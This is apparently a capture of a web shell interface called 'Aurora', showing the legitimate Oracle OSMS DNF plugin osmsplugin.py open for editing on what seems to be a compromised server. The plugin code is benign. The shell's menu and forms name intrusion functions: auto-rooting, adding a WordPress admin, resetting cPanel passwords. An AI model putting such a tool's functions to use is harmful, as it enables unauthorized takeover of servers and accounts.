Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
lib
python3.9
site-packages
dnf-plugins
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: osmsplugin.py
# Copyright (c) 2021, Oracle and/or its affiliates. All rights reserved.
# Licensed under the Universal Permissive License v 1.0 as shown at https://opensource.org/licenses/UPL.

import copy
import errno
import json
import logging
import os
import sys

import dnf
from dnf.conf.config import PRIO_PLUGINCONFIG
import dnf.exceptions
from dnfpluginscore import _, logger
import librepo

# The osms package is not on the default path; it must be added before the
# ``osms`` imports below.
sys.path.insert(0, '/usr/share/oracle-cloud-agent/plugins/osms')
from osms import actions
from osms import config
from osms.i18n import ustr
from osms.server import get_cacert, get_proxy, OsmsServer

# Name of the JSON file (inside dnf's persistdir) caching the channel list.
STORED_CHANNELS_NAME = '_osms.json'

RHN_DISABLED = _("OSMS based repositories will be disabled.")
COMMUNICATION_ERROR = _("There was an error communicating with OSMS server.")
NOT_REGISTERED_ERROR = _("This system is not registered with OSMS server.")
UPDATES_FROM_OSMS = _("This system is receiving updates from OSMS server.")
GPG_KEY_REJECTED = _(
    "For security reasons packages from OSMS based repositories can be "
    "verified only with locally installed gpg keys. GPG key '%s' has been "
    "rejected."
)
PROFILE_NOT_SENT = _("Package profile information could not be sent.")
MISSING_HEADER = _("Missing required login information for OSMS: %s")
MUST_BE_ROOT = _('OSMS plugin has to be run under with the root privileges.')


class OsmsPlugin(dnf.Plugin):
    """DNF plugin that registers OSMS channels as DNF repositories."""

    name = 'osmsplugin'

    def __init__(self, base, cli):
        """Load the plugin configuration and, if enabled, activate channels.

        The plugin disables itself (with a warning) when not run as root.
        """
        super(OsmsPlugin, self).__init__(base, cli)
        self.base = base
        self.cli = cli
        self.stored_channels_path = os.path.join(self.base.conf.persistdir,
                                                 STORED_CHANNELS_NAME)
        self.connected_to_osms = False
        self.up2date_cfg = {}
        # Work on a copy so plugin-level overrides do not leak into the
        # base configuration.
        self.conf = copy.copy(self.base.conf)
        self.parser = self.read_config(self.conf)
        if "main" in self.parser.sections():
            options = self.parser.items("main")
            for (key, value) in options:
                self.conf._set_value(key, value, PRIO_PLUGINCONFIG)
        if not dnf.util.am_i_root():
            logger.warning(MUST_BE_ROOT)
            self.conf.enabled = False
        if not self.conf.enabled:
            return

        # Map dnf's debuglevel onto a logging level for the root logger.
        if self.conf.debuglevel == 2:
            log_level = 'INFO'
        elif self.conf.debuglevel > 2:
            log_level = 'DEBUG'
        else:
            log_level = 'WARNING'
        init_root_logger(log_level)

        logger.debug('initialized OSMS plugin')
        self.activate_channels()

    def config(self):
        """Demand root privileges from the CLI when the plugin is enabled."""
        if not self.conf.enabled:
            return
        if self.cli:
            self.cli.demands.root_user = True

    def activate_channels(self, networking=True):
        """Create an OsmsRepo for every enabled channel and add it to base.

        With ``networking`` true the channel list is fetched from the OSMS
        server and written to the channels cache file; otherwise the cached
        list is used as-is. On communication or registration errors the
        problem is logged and no repositories are added.
        """
        enabled_channels = {}
        sslcacert = None
        force_http = 0
        proxy_url = None
        proxy_username = None
        proxy_password = None
        login_info = None
        cached_channels = self._read_channels_file()
        if not networking:
            # no network communication, use list of channels from persistdir
            # NOTE(review): login_info stays None on this path, and
            # OsmsRepo.create_http_headers() does a membership test on it --
            # confirm this path is actually exercised.
            enabled_channels = cached_channels
        else:
            self.up2date_cfg = config.initUp2dateConfig()
            proxy_url, proxy_username, proxy_password = get_proxy(
                self.up2date_cfg, external=True)
            sslcacert = get_cacert(self.up2date_cfg)
            force_http = self.up2date_cfg['useNoSSLForPackages']
            try:
                login_info = OsmsServer(timeout=self.conf.timeout).login()
            except Exception as e:
                logger.error("%s\n%s\n%s", COMMUNICATION_ERROR, RHN_DISABLED, e)
                return

            system_id = config.getSystemId()
            if not login_info or not system_id:
                logger.error("%s\n%s", NOT_REGISTERED_ERROR, RHN_DISABLED)
                # Not registered: drop any previously cached channels.
                self._write_channels_file({})
                return

            try:
                channels = OsmsServer(
                    timeout=self.conf.timeout).up2date.listChannels(system_id)
            except Exception as e:
                logger.error("%s\n%s\n%s", COMMUNICATION_ERROR, RHN_DISABLED, e)
                return

            self.connected_to_osms = True
            logger.info(UPDATES_FROM_OSMS)
            for channel in channels:
                # Only channels with a non-empty 'last_modified' are enabled.
                if channel['last_modified']:
                    enabled_channels[channel['label']] = dict(channel.items())
            self._write_channels_file(enabled_channels)

        repos = self.base.repos
        for channel_id, channel_dict in enabled_channels.items():
            cached_channel = cached_channels.get(channel_id)
            cached_version = None
            if cached_channel:
                cached_version = cached_channel.get('last_modified')

            # Per-channel section of the plugin config overrides [main].
            conf = copy.copy(self.conf)
            if channel_id in self.parser.sections():
                options = self.parser.items(channel_id)
                for (key, value) in options:
                    conf._set_value(key, value, PRIO_PLUGINCONFIG)

            opts = {
                'conf': self.base.conf,
                'proxy': proxy_url,
                'proxy_username': proxy_username,
                'proxy_password': proxy_password,
                'timeout': conf.timeout,
                'sslcacert': sslcacert,
                'force_http': force_http,
                'cached_version': cached_version,
                'login_info': login_info,
                'gpgcheck': conf.gpgcheck,
                'enabled': conf.enabled,
            }
            repo = OsmsRepo(channel_dict, opts)
            repos.add(repo)

        logger.debug(enabled_channels)

    def transaction(self):
        """ Update system's profile after transaction. """
        if not self.conf.enabled:
            return
        if not self.connected_to_osms:
            # not connected so nothing to do here
            return
        try:
            actions.package_refresh_list(timeout=self.conf.timeout)
        except Exception as e:
            logger.error("%s\n%s\n%s", COMMUNICATION_ERROR, PROFILE_NOT_SENT, e)

    def _read_channels_file(self):
        """Return the cached channel mapping, or ``{}`` if unavailable.

        A missing file, broken JSON, or JSON that is not an object all yield
        an empty dict; any other I/O error is re-raised.
        """
        try:
            with open(self.stored_channels_path, "r") as channels_file:
                content = channels_file.read()
                channels = json.loads(content)
                # Callers use .get()/.items(); treat any other JSON type the
                # same as a broken file so it gets recreated later.
                if isinstance(channels, dict):
                    return channels
        except (FileNotFoundError, IOError) as e:
            if e.errno != errno.ENOENT:
                raise
        except json.decoder.JSONDecodeError:
            pass  # ignore broken json and recreate it later
        return {}

    def _write_channels_file(self, var):
        """Dump ``var`` as JSON to the channels cache file.

        A missing target directory (ENOENT) is ignored; other I/O errors are
        re-raised.
        """
        try:
            with open(self.stored_channels_path, "w") as channels_file:
                json.dump(var, channels_file, indent=4)
        except (FileNotFoundError, IOError) as e:
            if e.errno != errno.ENOENT:
                raise


class OsmsRepo(dnf.repo.Repo):
    """DNF repository backed by a single OSMS channel."""

    # Login headers that must accompany every request to the OSMS server.
    needed_headers = [
        'X-RHN-Server-Id',
        'X-RHN-Auth-User-Id',
        'X-RHN-Auth',
        'X-RHN-Auth-Server-Time',
        'X-RHN-Auth-Expire-Offset',
    ]

    def __init__(self, channel, opts):
        """Configure the repository from a channel dict and an options dict.

        ``channel`` supplies 'label', 'name', 'gpg_key_url' and
        'last_modified'; ``opts`` is the dict built in
        OsmsPlugin.activate_channels().
        """
        super(OsmsRepo, self).__init__(ustr(channel['label']), opts.get('conf'))
        self.name = ustr(channel['name'])
        self.baseurl = [url + '/GET-REQ/' + self.id
                        for url in config.getServerlURL()]
        self.sslcacert = opts.get('sslcacert')
        self.proxy = opts.get('proxy')
        self.proxy_username = opts.get('proxy_username')
        self.proxy_password = opts.get('proxy_password')
        try:
            self.gpgkey = get_gpg_key_urls(channel['gpg_key_url'])
        except InvalidGpgKeyLocation as e:
            logger.warning(GPG_KEY_REJECTED, dnf.i18n.ucd(e))
            self.gpgkey = []
        # Channel changed since it was cached: expire metadata almost
        # immediately so it is refreshed.
        if channel['last_modified'] != opts.get('cached_version'):
            self.metadata_expire = 1
        self.login_info = opts.get('login_info')
        self.keepalive = 0
        self.bandwidth = 0
        self.retries = 1
        self.throttle = 0
        self.timeout = opts.get('timeout')
        self.gpgcheck = opts.get('gpgcheck')
        self.force_http = opts.get('force_http')
        if self.id.startswith('ocid'):
            logger.debug("Set module_hotfixes = True for custom repository %s",
                         self.id)
            self.module_hotfixes = True
        if opts.get('enabled'):
            self.enable()
        else:
            self.disable()
        if hasattr(self, 'set_http_headers'):
            # dnf > 4.0.9 on RHEL 8, Fedora 29/30
            http_headers = self.create_http_headers()
            if http_headers:
                self.set_http_headers(http_headers)

    def create_http_headers(self):
        """Build the list of HTTP header strings sent with each request.

        Raises dnf.exceptions.RepoError if a required login header is
        missing from ``self.login_info``.
        """
        http_headers = []
        for header in self.needed_headers:
            if header not in self.login_info:
                error = MISSING_HEADER % header
                raise dnf.exceptions.RepoError(error)
            if self.login_info[header] in (None, ''):
                # This doesn't work due to bug in librepo (or even deeper in libcurl)
                # the workaround below can be removed once BZ#1211662 is fixed
                # http_headers.append("%s;" % header)
                http_headers.append(
                    "%s: \r\nX-libcurl-Empty-Header-Workaround: *" % header)
            else:
                http_headers.append(
                    "%s: %s" % (header, self.login_info[header]))

        up2date_cfg = config.initUp2dateConfig()
        if up2date_cfg['tenantId']:
            http_headers.append('X-Tenant-Id: %s' % up2date_cfg['tenantId'])
        if not self.force_http:
            http_headers.append(
                "X-RHN-Transport-Capability: follow-redirects=3")
        # libdnf will set Content-Length = '' by default. An empty string is an
        # invalid value for Content-Length header. Explicitly set Content-Length to 0.
        http_headers.append('Content-Length: 0')
        return http_headers

    def _handle_new_remote(self, destdir, mirror_setup=True):
        """Return the parent's librepo handle with the OSMS headers set."""
        # this function is called only on dnf < 3.6.0 (up to Fedora 29)
        handle = super(OsmsRepo, self)._handle_new_remote(destdir, mirror_setup)
        http_headers = self.create_http_headers()
        if http_headers:
            handle.setopt(librepo.LRO_HTTPHEADER, http_headers)
        return handle


def get_gpg_key_urls(key_url_string):
    """
    Parse the key urls and validate them.

    key_url_string is a space separated list of gpg key urls that must be
    located in /etc/pki/rpm-gpg/.
    Return a list of strings containing the key urls.
    Raises InvalidGpgKeyLocation if any of the key urls are invalid.
    """
    key_urls = key_url_string.split()
    for key_url in key_urls:
        if not is_valid_gpg_key_url(key_url):
            raise InvalidGpgKeyLocation(key_url)
    return key_urls


class InvalidGpgKeyLocation(Exception):
    """Raised for a GPG key URL that is not a local /etc/pki/rpm-gpg/ file."""
    pass


def is_valid_gpg_key_url(key_url):
    """Return True only for ``file://`` URLs under /etc/pki/rpm-gpg/."""
    proto_split = key_url.split('://')
    if len(proto_split) != 2:
        return False

    proto, path = proto_split
    if proto.lower() != 'file':
        return False

    # Normalize first so '..' components cannot escape the key directory.
    path = os.path.normpath(path)
    if not path.startswith('/etc/pki/rpm-gpg/'):
        return False
    return True


def init_root_logger(log_level):
    """Silence the root logger unless it already has handlers."""
    # DNF doesn't setup root logger. Logs to root logger go to the console by
    # default, which interferes with dnf cli. Disable them before
    # DNF introduces a solution.
    root_logger = logging.getLogger()
    if root_logger.hasHandlers():
        return

    root_logger.propagate = 0
    root_logger.addHandler(logging.NullHandler())
    root_logger.setLevel(log_level)